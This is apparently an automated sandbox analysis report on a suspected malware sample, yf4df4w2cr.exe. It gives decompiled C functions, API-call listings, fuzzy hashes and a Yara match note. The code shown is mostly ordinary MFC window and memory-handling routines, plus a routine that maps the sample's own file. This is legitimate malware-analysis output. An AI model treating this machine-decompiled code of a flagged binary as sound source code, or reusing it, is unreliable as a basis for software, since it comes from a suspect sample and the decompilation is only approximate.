                  control_flow_graph 353 4206ea-42070b EnterCriticalSection 354 42071a-42071f 353->354 355 42070d-420714 353->355 357 420721-420724 354->357 358 42073c-420744 354->358 355->354 356 4207d8-4207db 355->356 360 4207e3-420801 LeaveCriticalSection 356->360 361 4207dd-4207e0 356->361 359 420727-42072a 357->359 362 420746-420759 call 4148c1 GlobalAlloc 358->362 363 42075b-42077f GlobalHandle GlobalUnlock call 4148c1 GlobalReAlloc 358->363 364 420734-420736 359->364 365 42072c-420732 359->365 361->360 370 420785-420787 362->370 363->370 364->356 364->358 365->359 365->364 371 420789-42078e 370->371 372 4207ac-4207d5 GlobalLock call 431160 370->372 373 420790-420798 GlobalHandle GlobalLock 371->373 374 42079e-4207a7 LeaveCriticalSection call 4063fe 371->374 372->356 373->374 374->372
                  C-Code - Quality: 90%
                  			E004206EA(void* __ecx) {
                  				struct _CRITICAL_SECTION* _v8;
                  				void* _v12;
                  				void* __ebx;
                  				void* __edi;
                  				void* __esi;
                  				void* __ebp;
                  				struct _CRITICAL_SECTION* _t34;
                  				void* _t35;
                  				void* _t36;
                  				long _t38;
                  				void* _t39;
                  				void* _t40;
                  				long _t51;
                  				signed char* _t53;
                  				intOrPtr _t56;
                  				signed int _t57;
                  				void* _t61;
                  				signed int _t68;
                  				void* _t72;
                  
                  				_t59 = __ecx;
                  				_push(__ecx);
                  				_push(__ecx);
                  				_t72 = __ecx;
                  				_t1 = _t72 + 0x1c; // 0x466584
                  				_t34 = _t1;
                  				_v8 = _t34;
                  				EnterCriticalSection(_t34);
                  				_t3 = _t72 + 4; // 0x20
                  				_t56 =  *_t3;
                  				_t4 = _t72 + 8; // 0x3
                  				_t68 =  *_t4;
                  				if(_t68 >= _t56) {
                  					L2:
                  					_t68 = 1;
                  					if(_t56 <= 1) {
                  						L7:
                  						_t13 = _t72 + 0x10; // 0x5b88a8
                  						_t35 =  *_t13;
                  						_t57 = _t56 + 0x20;
                  						_t83 = _t35;
                  						if(_t35 != 0) {
                  							_t36 = GlobalHandle(_t35);
                  							_v12 = _t36;
                  							GlobalUnlock(_t36);
                  							_t38 = E004148C1(_t59, __eflags, _t57, 8);
                  							_t61 = 0x2002;
                  							_t39 = GlobalReAlloc(_v12, _t38, ??);
                  						} else {
                  							_t51 = E004148C1(_t59, _t83, _t57, 8);
                  							_pop(_t61);
                  							_t39 = GlobalAlloc(2, _t51); // executed
                  						}
                  						if(_t39 == 0) {
                  							_t16 = _t72 + 0x10; // 0x5b88a8
                  							_t72 =  *_t16;
                  							_t85 = _t72;
                  							if(_t72 != 0) {
                  								GlobalLock(GlobalHandle(_t72));
                  							}
                  							LeaveCriticalSection(_v8);
                  							_t39 = E004063FE(_t57, _t61, _t68, _t72, _t85);
                  						}
                  						_t40 = GlobalLock(_t39);
                  						_t18 = _t72 + 4; // 0x20
                  						_v12 = _t40;
                  						E00431160(_t68, _t40 +  *_t18 * 8, 0, _t57 -  *_t18 << 3);
                  						 *(_t72 + 4) = _t57;
                  						 *(_t72 + 0x10) = _v12;
                  					} else {
                  						_t10 = _t72 + 0x10; // 0x5b88a8
                  						_t53 =  *_t10 + 8;
                  						while(( *_t53 & 0x00000001) != 0) {
                  							_t68 = _t68 + 1;
                  							_t53 =  &(_t53[8]);
                  							if(_t68 < _t56) {
                  								continue;
                  							}
                  							break;
                  						}
                  						if(_t68 >= _t56) {
                  							goto L7;
                  						}
                  					}
                  				} else {
                  					_t5 = _t72 + 0x10; // 0x5b88a8
                  					if(( *( *_t5 + _t68 * 8) & 0x00000001) != 0) {
                  						goto L2;
                  					}
                  				}
                  				_t25 = _t72 + 0xc; // 0x3
                  				if(_t68 >=  *_t25) {
                  					_t26 = _t68 + 1; // 0x4
                  					 *((intOrPtr*)(_t72 + 0xc)) = _t26;
                  				}
                  				_t28 = _t72 + 0x10; // 0x5b88a8
                  				 *( *_t28 + _t68 * 8) =  *( *_t28 + _t68 * 8) | 0x00000001;
                  				_t32 = _t68 + 1; // 0x4
                  				 *(_t72 + 8) = _t32;
                  				LeaveCriticalSection(_v8);
                  				return _t68;
                  			}

                  APIs
                  • EnterCriticalSection.KERNEL32(00466584,?,?,?,00466568,00466568,?,00420B40,00000004,0041F372,00406452,00411FA3), ref: 004206FD
                  • GlobalAlloc.KERNELBASE(00000002,00000000,?,?,?,00466568,00466568,?,00420B40,00000004,0041F372,00406452,00411FA3), ref: 00420753
                  • GlobalHandle.KERNEL32 ref: 0042075C
                  • GlobalUnlock.KERNEL32(00000000,?,?,?,00466568,00466568,?,00420B40,00000004,0041F372,00406452,00411FA3), ref: 00420766
                  • GlobalReAlloc.KERNEL32(00406452,00000000,00002002), ref: 0042077F
                  • GlobalHandle.KERNEL32 ref: 00420791
                  • GlobalLock.KERNEL32 ref: 00420798
                  • LeaveCriticalSection.KERNEL32(00411FA3,?,?,?,00466568,00466568,?,00420B40,00000004,0041F372,00406452,00411FA3), ref: 004207A1
                  • GlobalLock.KERNEL32 ref: 004207AD
                  • _memset.LIBCMT ref: 004207C7
                  • LeaveCriticalSection.KERNEL32(00411FA3,0041F372,00406452,00411FA3), ref: 004207F5
                  Memory Dump Source
                  • Source File: 00000001.00000002.659116467.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000001.00000002.659112623.0000000000400000.00000002.00020000.sdmp
                  • Associated: 00000001.00000002.659156937.000000000044E000.00000002.00020000.sdmp
                  • Associated: 00000001.00000002.659178064.0000000000462000.00000004.00020000.sdmp
                  • Associated: 00000001.00000002.659187745.0000000000469000.00000002.00020000.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_1_2_400000_YF4dF4w2Cr.jbxd
                  Similarity
                  • API ID: Global$CriticalSection$AllocHandleLeaveLock$EnterUnlock_memset
                  • String ID:
                  • API String ID: 496899490-0
                  • Opcode ID: 23f39eb05e2f5900db8e0de7ebe0022c99c89241aa9ce15b00d395ab25b9ed35
                  • Instruction ID: df76cc218ce0eed47cdce916ccd5606461eaefea175fd580b96fa8a2acb9575c
                  • Opcode Fuzzy Hash: 23f39eb05e2f5900db8e0de7ebe0022c99c89241aa9ce15b00d395ab25b9ed35
                  • Instruction Fuzzy Hash: FA31DC75600714AFD7209F6AEC89A5ABBF9FF84304B00492EE942D3661DB74F8408F18
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Control-flow Graph

                  C-Code - Quality: 96%
                  			E00410B6D(void* __ebx, void* __ecx, void* __edx, void* __edi, void* __esi, void* __eflags) {
                  				_Unknown_base(*)()* _t31;
                  				void* _t33;
                  				void* _t34;
                  				long _t39;
                  				void* _t40;
                  				void* _t43;
                  				void* _t61;
                  				void* _t65;
                  				struct HWND__* _t67;
                  				CHAR* _t69;
                  				void* _t72;
                  
                  				_t65 = __edx;
                  				_t61 = __ecx;
                  				_push(0x40);
                  				E00431ACE(E0044B0B7, __ebx, __edi, __esi);
                  				_t67 =  *(_t72 + 8);
                  				_t69 = "AfxOldWndProc423";
                  				_t31 = GetPropA(_t67, _t69);
                  				 *(_t72 - 0x14) =  *(_t72 - 0x14) & 0x00000000;
                  				 *(_t72 - 4) =  *(_t72 - 4) & 0x00000000;
                  				 *(_t72 - 0x18) = _t31;
                  				_t59 = 1;
                  				_t33 =  *(_t72 + 0xc) - 6;
                  				if(_t33 == 0) {
                  					_t34 = E0040EE3C(1, _t61,  *(_t72 + 0x14));
                  					E00410A7D(_t61, E0040EE3C(1, _t61, _t67),  *(_t72 + 0x10), _t34);
                  					goto L9;
                  				} else {
                  					_t40 = _t33 - 0x1a;
                  					if(_t40 == 0) {
                  						_t59 = 0 | E00410AF5(1, _t67, E0040EE3C(1, _t61, _t67),  *(_t72 + 0x14),  *(_t72 + 0x14) >> 0x10) == 0x00000000;
                  						L9:
                  						if(_t59 != 0) {
                  							goto L10;
                  						}
                  					} else {
                  						_t43 = _t40 - 0x62;
                  						if(_t43 == 0) {
                  							SetWindowLongA(_t67, 0xfffffffc,  *(_t72 - 0x18));
                  							RemovePropA(_t67, _t69);
                  							GlobalDeleteAtom(GlobalFindAtomA(_t69) & 0x0000ffff);
                  							goto L10;
                  						} else {
                  							if(_t43 != 0x8e) {
                  								L10:
                  								_t39 = CallWindowProcA( *(_t72 - 0x18), _t67,  *(_t72 + 0xc),  *(_t72 + 0x10),  *(_t72 + 0x14)); // executed
                  								 *(_t72 - 0x14) = _t39;
                  							} else {
                  								E0040D7C1(E0040EE3C(1, _t61, _t67), _t72 - 0x30, _t72 - 0x20);
                  								 *(_t72 - 0x14) = CallWindowProcA( *(_t72 - 0x18), _t67, 0x110,  *(_t72 + 0x10),  *(_t72 + 0x14));
                  								E0040F5B7(1, _t65, _t50, _t72 - 0x30,  *((intOrPtr*)(_t72 - 0x20)));
                  							}
                  						}
                  					}
                  				}
                  				return E00431B73( *(_t72 - 0x14));
                  			}

                  APIs
                  Strings
                  Memory Dump Source
                  • Source File: 00000001.00000002.659116467.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000001.00000002.659112623.0000000000400000.00000002.00020000.sdmp
                  • Associated: 00000001.00000002.659156937.000000000044E000.00000002.00020000.sdmp
                  • Associated: 00000001.00000002.659178064.0000000000462000.00000004.00020000.sdmp
                  • Associated: 00000001.00000002.659187745.0000000000469000.00000002.00020000.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_1_2_400000_YF4dF4w2Cr.jbxd
                  Similarity
                  • API ID: Window$AtomCallGlobalProcProp$DeleteFindH_prolog3_catchLongRectRemove
                  • String ID: AfxOldWndProc423
                  • API String ID: 2109165785-1060338832
                  • Opcode ID: f8daf118ba78ef8a89b28ddf675110c5a81804194b7a1092223d3a2c73349c4a
                  • Instruction ID: 7d730690561c9216d8e88f9ae386013ec32041a0da163b1d26ff2b3a16a30a38
                  • Opcode Fuzzy Hash: f8daf118ba78ef8a89b28ddf675110c5a81804194b7a1092223d3a2c73349c4a
                  • Instruction Fuzzy Hash: 2B316D32800219BBCF11AFE6DD4DDFF7A78BF09305F00052AF501B2161DB7999A09BA9
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Control-flow Graph

                  • Executed
                  • Not Executed
                  control_flow_graph 426 4064f0-4064ff 427 406505-406546 GetDC GetSystemMetrics CreateFontA 426->427 428 406588-406589 426->428 429 406551-406565 GetCharWidthA 427->429 430 406548-40654e SelectObject 427->430 431 406576-406587 ReleaseDC 429->431 432 406567-406570 SelectObject DeleteObject 429->432 430->429 431->428 432->431
                  C-Code - Quality: 100%
                  			E004064F0(void* __ecx) {
                  				struct HDC__* _v8;
                  				void* _v12;
                  				int _t9;
                  				int _t15;
                  				void* _t20;
                  
                  				_t9 =  *0x462634; // 0xf
                  				if(_t9 == 0xffffffff) {
                  					_v8 = GetDC(0);
                  					_v12 = 0;
                  					_t20 = CreateFontA(GetSystemMetrics(0x48), 0, 0, 0, 0x190, 0, 0, 0, 2, 0, 0, 0, 0, "Marlett");
                  					if(_t20 != 0) {
                  						_v12 = SelectObject(_v8, _t20);
                  					}
                  					GetCharWidthA(_v8, 0x36, 0x36, 0x462634); // executed
                  					if(_t20 != 0) {
                  						SelectObject(_v8, _v12);
                  						DeleteObject(_t20);
                  					}
                  					ReleaseDC(0, _v8);
                  					_t15 =  *0x462634; // 0xf
                  					return _t15;
                  				}
                  				return _t9;
                  			}

                  APIs
                  • GetDC.USER32(00000000), ref: 0040650B
                  • GetSystemMetrics.USER32 ref: 0040652F
                  • CreateFontA.GDI32(00000000), ref: 00406536
                  • SelectObject.GDI32(?,00000000), ref: 0040654C
                  • GetCharWidthA.GDI32(?,00000036,00000036,00462634), ref: 0040655D
                  • SelectObject.GDI32(?,?), ref: 0040656D
                  • DeleteObject.GDI32(00000000), ref: 00406570
                  • ReleaseDC.USER32 ref: 0040657A
                  Strings
                  Memory Dump Source
                  • Source File: 00000001.00000002.659116467.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000001.00000002.659112623.0000000000400000.00000002.00020000.sdmp
                  • Associated: 00000001.00000002.659156937.000000000044E000.00000002.00020000.sdmp
                  • Associated: 00000001.00000002.659178064.0000000000462000.00000004.00020000.sdmp
                  • Associated: 00000001.00000002.659187745.0000000000469000.00000002.00020000.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_1_2_400000_YF4dF4w2Cr.jbxd
                  Similarity
                  • API ID: Object$Select$CharCreateDeleteFontMetricsReleaseSystemWidth
                  • String ID: Marlett
                  • API String ID: 1397664628-3688754224
                  • Opcode ID: d625e81e30d2d5b5eacfecf79bbbfade7bba1e7911b5c54bb0e160659e22b730
                  • Instruction ID: e81e0d02648677b469a39f7f1f5c13e3aea240fbea2e15458392ef8c70e3ee26
                  • Opcode Fuzzy Hash: d625e81e30d2d5b5eacfecf79bbbfade7bba1e7911b5c54bb0e160659e22b730
                  • Instruction Fuzzy Hash: 2C118E35942224BBD7215BA2ED4EDCFBE2DFF16BA0F510021F109A11A0C6B10E00CBA8
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Control-flow Graph

                  • Executed
                  • Not Executed
                  control_flow_graph 433 42143d-42145e DefWindowProcA 434 421546-421549 433->434 435 421464-42148f GetWindowRect 433->435 436 421491-42149b 435->436 437 4214ed-4214ef 435->437 436->437 438 42149d-4214ea SetRect InvalidateRect SetRect InvalidateRect 436->438 439 4214f1-4214fb 437->439 440 421545 437->440 438->437 439->440 441 4214fd-42153f SetRect InvalidateRect SetRect InvalidateRect 439->441 440->434 441->440
                  C-Code - Quality: 100%
                  			E0042143D(void* __ecx, int _a4) {
                  				int _v8;
                  				struct tagRECT _v24;
                  				long _t39;
                  				int _t42;
                  				int _t43;
                  				int _t62;
                  				int _t66;
                  				void* _t68;
                  				long _t69;
                  				int _t71;
                  
                  				_t69 = _a4;
                  				_t68 = __ecx;
                  				_t39 = DefWindowProcA( *(__ecx + 0x20), 0x46, 0, _t69); // executed
                  				if(( *(_t69 + 0x18) & 0x00000001) == 0) {
                  					GetWindowRect( *(_t68 + 0x20),  &_v24);
                  					_t42 = _a4;
                  					_t66 =  *(_t42 + 0x10);
                  					_t71 = _v24.right - _v24.left;
                  					_t62 = _v24.bottom - _v24.top;
                  					_t43 =  *(_t42 + 0x14);
                  					_v8 = _t66;
                  					_a4 = _t43;
                  					if(_t66 != _t71 && ( *(_t68 + 0x84) & 0x00000400) != 0) {
                  						SetRect( &_v24, _t66 -  *0x466520, 0, _t66, _t43);
                  						InvalidateRect( *(_t68 + 0x20),  &_v24, 1);
                  						SetRect( &_v24, _t71 -  *0x466520, 0, _t71, _a4);
                  						InvalidateRect( *(_t68 + 0x20),  &_v24, 1);
                  						_t66 = _v8;
                  						_t43 = _a4;
                  					}
                  					if(_t43 != _t62 && ( *(_t68 + 0x84) & 0x00000800) != 0) {
                  						SetRect( &_v24, 0, _t43 -  *0x466524, _t66, _t43);
                  						InvalidateRect( *(_t68 + 0x20),  &_v24, 1);
                  						SetRect( &_v24, 0, _t62 -  *0x466524, _v8, _t62);
                  						_t43 = InvalidateRect( *(_t68 + 0x20),  &_v24, 1);
                  					}
                  					return _t43;
                  				}
                  				return _t39;
                  			}

                  APIs
                  • DefWindowProcA.USER32(?,00000046,00000000,?,?,?), ref: 00421454
                  • GetWindowRect.USER32 ref: 0042146C
                  • SetRect.USER32 ref: 004214AC
                  • InvalidateRect.USER32(?,?,00000001), ref: 004214BB
                  • SetRect.USER32 ref: 004214D2
                  • InvalidateRect.USER32(?,?,00000001), ref: 004214E1
                  • SetRect.USER32 ref: 00421512
                  • InvalidateRect.USER32(?,?,00000001), ref: 0042151D
                  • SetRect.USER32 ref: 00421534
                  • InvalidateRect.USER32(?,?,00000001), ref: 0042153F
                  Memory Dump Source
                  • Source File: 00000001.00000002.659116467.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000001.00000002.659112623.0000000000400000.00000002.00020000.sdmp
                  • Associated: 00000001.00000002.659156937.000000000044E000.00000002.00020000.sdmp
                  • Associated: 00000001.00000002.659178064.0000000000462000.00000004.00020000.sdmp
                  • Associated: 00000001.00000002.659187745.0000000000469000.00000002.00020000.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_1_2_400000_YF4dF4w2Cr.jbxd
                  Similarity
                  • API ID: Rect$Invalidate$Window$Proc
                  • String ID:
                  • API String ID: 570070710-0
                  • Opcode ID: 600d90e0c36db47e27be2003a9a329f79ea7bd473ed92dd9532af274cc9c2e19
                  • Instruction ID: 67fc1e0d515d65dd7be6bb3fc1ba63dd0bc7bc45e6ac663643d9f47821cdaeb9
                  • Opcode Fuzzy Hash: 600d90e0c36db47e27be2003a9a329f79ea7bd473ed92dd9532af274cc9c2e19
                  • Instruction Fuzzy Hash: 25311A76A00119BFDB14CFA4DD89FAABB7CFB08300F110165FA05A7160D770AA54CBA5
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Control-flow Graph

                  APIs
                  • CreateFileW.KERNELBASE(C:\Users\user\Desktop\yf4df4w2cr.exe,80000000,00000001,00000000,00000003,00000000,00000000,00000102,?,023ED676,00000102,023EAC19,?,023EAC8F), ref: 023ED0FF
                  • CreateFileMappingW.KERNELBASE(00000000,00000000,00000002,00000000,00000000,00000000,?,?,023ED676,00000102,023EAC19,?,023EAC8F), ref: 023ED114
                  • MapViewOfFile.KERNELBASE(00000000,00000004,00000000,00000000,00000000,?,?,023ED676,00000102,023EAC19,?,023EAC8F), ref: 023ED126
                  • GetFileSize.KERNEL32(00000000,00000000,?,?,023ED676,00000102,023EAC19,?,023EAC8F), ref: 023ED135
                  • UnmapViewOfFile.KERNEL32(00000000,?,?,023ED676,00000102,023EAC19,?,023EAC8F), ref: 023ED14B
                  • FindCloseChangeNotification.KERNELBASE(00000000,?,?,023ED676,00000102,023EAC19,?,023EAC8F), ref: 023ED152
                  • CloseHandle.KERNEL32(00000000,?,?,023ED676,00000102,023EAC19,?,023EAC8F), ref: 023ED159
                  Strings
                  • C:\Users\user\Desktop\yf4df4w2cr.exe, xrefs: 023ED0FA
                  Memory Dump Source
                  • Source File: 00000001.00000002.659738344.00000000023E1000.00000020.00000001.sdmp, Offset: 023E1000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_1_2_23e1000_YF4dF4w2Cr.jbxd
                  Yara matches
                  Similarity
                  • API ID: File$CloseCreateView$ChangeFindHandleMappingNotificationSizeUnmap
                  • String ID: C:\Users\user\Desktop\yf4df4w2cr.exe
                  • API String ID: 925460653-4017221262
                  • Opcode ID: 6d53d37a3b8ab5235604d04f88e72700d7ee04948d2994fb249b723993269e8d
                  • Instruction ID: eb1bd7e3ad3cb23053fc57030c957b31abfcccd135afa5c553945f6d7670913f
                  • Opcode Fuzzy Hash: 6d53d37a3b8ab5235604d04f88e72700d7ee04948d2994fb249b723993269e8d
                  • Instruction Fuzzy Hash: 6F0131F2A8021CBFF69516A87CCDF7B366CEB4979AF100415F702912C597A44C264670
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Control-flow Graph

                  • Executed
                  • Not Executed
                  control_flow_graph 477 40f201-40f224 478 40f226-40f22d 477->478 479 40f22f-40f236 GetClientRect 477->479 480 40f23c-40f24a 478->480 479->480 481 40f259 480->481 482 40f24c-40f257 BeginDeferWindowPos 480->482 483 40f25d-40f268 GetTopWindow 481->483 482->483 484 40f2ab-40f2af 483->484 485 40f2b1-40f2b5 484->485 486 40f26a-40f27c GetDlgCtrlID call 40ee68 484->486 487 40f2e1-40f2e4 485->487 488 40f2b7-40f2ba 485->488 498 40f283-40f286 486->498 499 40f27e-40f281 486->499 492 40f2e6-40f2e9 487->492 493 40f338-40f33b 487->493 490 40f2cb-40f2df 488->490 491 40f2bc-40f2c9 CopyRect 488->491 495 40f346-40f34a 490->495 491->495 492->493 497 40f2eb-40f2f7 call 40ee3c 492->497 493->495 496 40f33d-40f340 KiUserCallbackDispatcher 493->496 496->495 506 40f313-40f31a 497->506 507 40f2f9-40f310 497->507 501 40f2a2-40f2a5 GetWindow 498->501 502 40f288-40f28b 498->502 499->501 501->484 502->501 503 40f28d-40f28f 502->503 503->501 505 40f291-40f29c SendMessageA 503->505 505->501 506->493 508 40f31c-40f333 call 40cee2 506->508 507->506 508->493
                  C-Code - Quality: 92%
                  			E0040F201(int __ecx, intOrPtr _a4, intOrPtr _a8, signed int _a12, signed int _a16, struct tagRECT* _a20, signed int _a24, intOrPtr _a28) {
                  				int _v8;
                  				intOrPtr _v12;
                  				int _v16;
                  				int _v20;
                  				struct tagRECT _v36;
                  				void* _v40;
                  				void* __ebx;
                  				void* __edi;
                  				void* __esi;
                  				signed int _t61;
                  				int _t62;
                  				signed int _t64;
                  				int _t72;
                  				intOrPtr* _t84;
                  				struct HWND__* _t90;
                  
                  				_t72 = __ecx;
                  				_t74 = _a28;
                  				_v8 = 0;
                  				_v12 = _a28;
                  				_v16 = 0;
                  				_v20 = 0;
                  				if(_a24 == 0) {
                  					GetClientRect( *(__ecx + 0x20),  &_v36);
                  				} else {
                  					asm("movsd");
                  					asm("movsd");
                  					asm("movsd");
                  					asm("movsd");
                  				}
                  				_t61 = _a16 & 0xffff7fff;
                  				_a24 = _t61;
                  				if(_t61 == 1) {
                  					_t13 =  &_v40;
                  					 *_t13 = _v40 & 0x00000000;
                  					__eflags =  *_t13;
                  				} else {
                  					_v40 = BeginDeferWindowPos(8);
                  				}
                  				_t62 = GetTopWindow( *(_t72 + 0x20));
                  				while(1) {
                  					_t90 = _t62;
                  					if(_t90 == 0) {
                  						break;
                  					}
                  					_t72 = GetDlgCtrlID(_t90);
                  					_t64 = E0040EE68(_t74, 0, _t90, __eflags, _t90);
                  					__eflags = _t72 - _a12;
                  					if(__eflags != 0) {
                  						__eflags = _t72 - _a4;
                  						if(__eflags >= 0) {
                  							__eflags = _t72 - _a8;
                  							if(__eflags <= 0) {
                  								__eflags = _t64;
                  								if(__eflags != 0) {
                  									SendMessageA(_t90, 0x361, 0,  &_v40); // executed
                  								}
                  							}
                  						}
                  					} else {
                  						_v8 = _t90;
                  					}
                  					_t62 = GetWindow(_t90, 2);
                  				}
                  				if(_a24 != 1) {
                  					__eflags = _a12;
                  					if(_a12 != 0) {
                  						__eflags = _v8;
                  						if(_v8 != 0) {
                  							_t62 = E0040EE3C(_t72, _t74, _v8);
                  							__eflags = _a24 - 2;
                  							if(_a24 == 2) {
                  								_t84 = _a20;
                  								_v36.left = _v36.left +  *_t84;
                  								_v36.top = _v36.top +  *((intOrPtr*)(_t84 + 4));
                  								_v36.right = _v36.right -  *((intOrPtr*)(_t84 + 8));
                  								_t45 =  &(_v36.bottom);
                  								 *_t45 = _v36.bottom -  *((intOrPtr*)(_t84 + 0xc));
                  								__eflags =  *_t45;
                  							}
                  							__eflags = _a16 & 0x00008000;
                  							if((_a16 & 0x00008000) == 0) {
                  								 *((intOrPtr*)( *_t62 + 0x68))( &_v36, 0);
                  								_t62 = E0040CEE2( &_v40, _v8,  &_v36);
                  							}
                  						}
                  					}
                  					__eflags = _v40;
                  					if(_v40 != 0) {
                  						_t62 = EndDeferWindowPos(_v40); // executed
                  					}
                  				} else {
                  					if(_a28 == 0) {
                  						_t62 = _a20;
                  						 *((intOrPtr*)(_t62 + 8)) = _v20;
                  						 *((intOrPtr*)(_t62 + 4)) = 0;
                  						 *_t62 = 0;
                  						 *((intOrPtr*)(_t62 + 0xc)) = _v16;
                  					} else {
                  						_t62 = CopyRect(_a20,  &_v36);
                  					}
                  				}
                  				return _t62;
                  			}



















                  APIs
                  • GetClientRect.USER32 ref: 0040F236
                  • BeginDeferWindowPos.USER32 ref: 0040F24E
                  • GetTopWindow.USER32(00000001), ref: 0040F260
                  • GetDlgCtrlID.USER32 ref: 0040F26B
                  • SendMessageA.USER32(00000000,00000361,00000000,00000000), ref: 0040F29C
                  • GetWindow.USER32(00000000,00000002), ref: 0040F2A5
                  • CopyRect.USER32 ref: 0040F2C3
                  • KiUserCallbackDispatcher.NTDLL(00000000,?,00000001), ref: 0040F340
                  Memory Dump Source
                  • Source File: 00000001.00000002.659116467.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000001.00000002.659112623.0000000000400000.00000002.00020000.sdmp
                  • Associated: 00000001.00000002.659156937.000000000044E000.00000002.00020000.sdmp
                  • Associated: 00000001.00000002.659178064.0000000000462000.00000004.00020000.sdmp
                  • Associated: 00000001.00000002.659187745.0000000000469000.00000002.00020000.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_1_2_400000_YF4dF4w2Cr.jbxd
                  Similarity
                  • API ID: Window$Rect$BeginCallbackClientCopyCtrlDeferDispatcherMessageSendUser
                  • String ID:
                  • API String ID: 1656430526-0
                  • Opcode ID: 6d2dbe2eeacec313d78451a0fb5afa6627e160b037f6c151f147efc9526f9ac5
                  • Instruction ID: 0940655b8c9f504fb26903620ff38c1a6262de45de23ed48141b808c52172a37
                  • Opcode Fuzzy Hash: 6d2dbe2eeacec313d78451a0fb5afa6627e160b037f6c151f147efc9526f9ac5
                  • Instruction Fuzzy Hash: 6A417B75900209EFCF20DF95C8849EEB7B5FF49314B1441BAE801B7290D7399A45CFA9
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Control-flow Graph

                  C-Code - Quality: 100%
                  			E004203BF(void* __ecx) {
                  				int _t5;
                  				struct HDC__* _t15;
                  				void* _t17;
                  
                  				_t17 = __ecx; // executed
                  				_t5 = GetSystemMetrics(0xb); // executed
                  				 *((intOrPtr*)(_t17 + 8)) = _t5;
                  				 *((intOrPtr*)(_t17 + 0xc)) = GetSystemMetrics(0xc);
                  				 *0x466510 = GetSystemMetrics(2) + 1;
                  				 *0x466514 = GetSystemMetrics(3) + 1;
                  				_t15 = GetDC(0);
                  				 *((intOrPtr*)(_t17 + 0x18)) = GetDeviceCaps(_t15, 0x58);
                  				 *((intOrPtr*)(_t17 + 0x1c)) = GetDeviceCaps(_t15, 0x5a);
                  				return ReleaseDC(0, _t15);
                  			}







                  APIs
                  • KiUserCallbackDispatcher.NTDLL ref: 004203CE
                  • GetSystemMetrics.USER32 ref: 004203D5
                  • GetSystemMetrics.USER32 ref: 004203DC
                  • GetSystemMetrics.USER32 ref: 004203E6
                  • GetDC.USER32(00000000), ref: 004203F0
                  • GetDeviceCaps.GDI32(00000000,00000058), ref: 00420401
                  • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00420409
                  • ReleaseDC.USER32 ref: 00420411
                  Memory Dump Source
                  • Source File: 00000001.00000002.659116467.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000001.00000002.659112623.0000000000400000.00000002.00020000.sdmp
                  • Associated: 00000001.00000002.659156937.000000000044E000.00000002.00020000.sdmp
                  • Associated: 00000001.00000002.659178064.0000000000462000.00000004.00020000.sdmp
                  • Associated: 00000001.00000002.659187745.0000000000469000.00000002.00020000.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_1_2_400000_YF4dF4w2Cr.jbxd
                  Similarity
                  • API ID: MetricsSystem$CapsDevice$CallbackDispatcherReleaseUser
                  • String ID:
                  • API String ID: 1031845853-0
                  • Opcode ID: b9b20a255bf8ec8179fb1d58bd2a46d1a8caece91da757cd9b7519637d2d4eb4
                  • Instruction ID: c70a73cfab10beb5ae40e0ca9f9cf222f8cc2b62db800e03fd6d50582627701f
                  • Opcode Fuzzy Hash: b9b20a255bf8ec8179fb1d58bd2a46d1a8caece91da757cd9b7519637d2d4eb4
                  • Instruction Fuzzy Hash: F2F067B1E40724BAE7105F72AC4AB1A7F68FB41721F014826E6158B280EBB598108FD4
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Control-flow Graph

                  C-Code - Quality: 94%
                  			E00411F96(void* __ebx, void* __ecx, void* __edi, void* __esi, void* __eflags, signed int _a4) {
                  				intOrPtr _v8;
                  				signed int _v12;
                  				signed int _v16;
                  				char* _v20;
                  				signed int _v28;
                  				intOrPtr _v32;
                  				intOrPtr _v40;
                  				intOrPtr _v52;
                  				signed int _v56;
                  				void* __ebp;
                  				intOrPtr _t127;
                  				void* _t133;
                  				intOrPtr _t135;
                  				signed int _t145;
                  				signed int _t150;
                  				signed int _t167;
                  				signed int _t183;
                  				signed int _t185;
                  				signed int _t187;
                  				signed int _t189;
                  				signed int _t191;
                  				signed int _t195;
                  				void* _t198;
                  				intOrPtr _t199;
                  				signed int _t209;
                  
                  				_t198 = __ecx;
                  				_t127 = E0041F363(__ebx, __edi, __esi, __eflags);
                  				_v8 = _t127;
                  				_t3 =  &_a4;
                  				 *_t3 = _a4 &  !( *(_t127 + 0x18));
                  				if( *_t3 == 0) {
                  					return 1;
                  				}
                  				_push(__ebx);
                  				_push(__esi);
                  				_push(__edi);
                  				_t209 = 0;
                  				E00431160(0,  &_v56, 0, 0x28);
                  				_v52 = DefWindowProcA;
                  				_t133 = E0041F363(__ebx, 0, 0, __eflags);
                  				__eflags = _a4 & 0x00000001;
                  				_v40 =  *((intOrPtr*)(_t133 + 8));
                  				_t135 =  *0x466550; // 0x10003
                  				_t195 = 8;
                  				_v32 = _t135;
                  				_v16 = _t195;
                  				if(__eflags != 0) {
                  					_push( &_v56);
                  					_v56 = 0xb;
                  					_v20 = "AfxWnd90s";
                  					_t191 = E00411C95(_t195, _t198, 0, 0, __eflags);
                  					__eflags = _t191;
                  					if(_t191 != 0) {
                  						_t209 = 1;
                  						__eflags = 1;
                  					}
                  				}
                  				__eflags = _a4 & 0x00000020;
                  				if(__eflags != 0) {
                  					_v56 = _v56 | 0x0000008b;
                  					_push( &_v56);
                  					_v20 = "AfxOleControl90s";
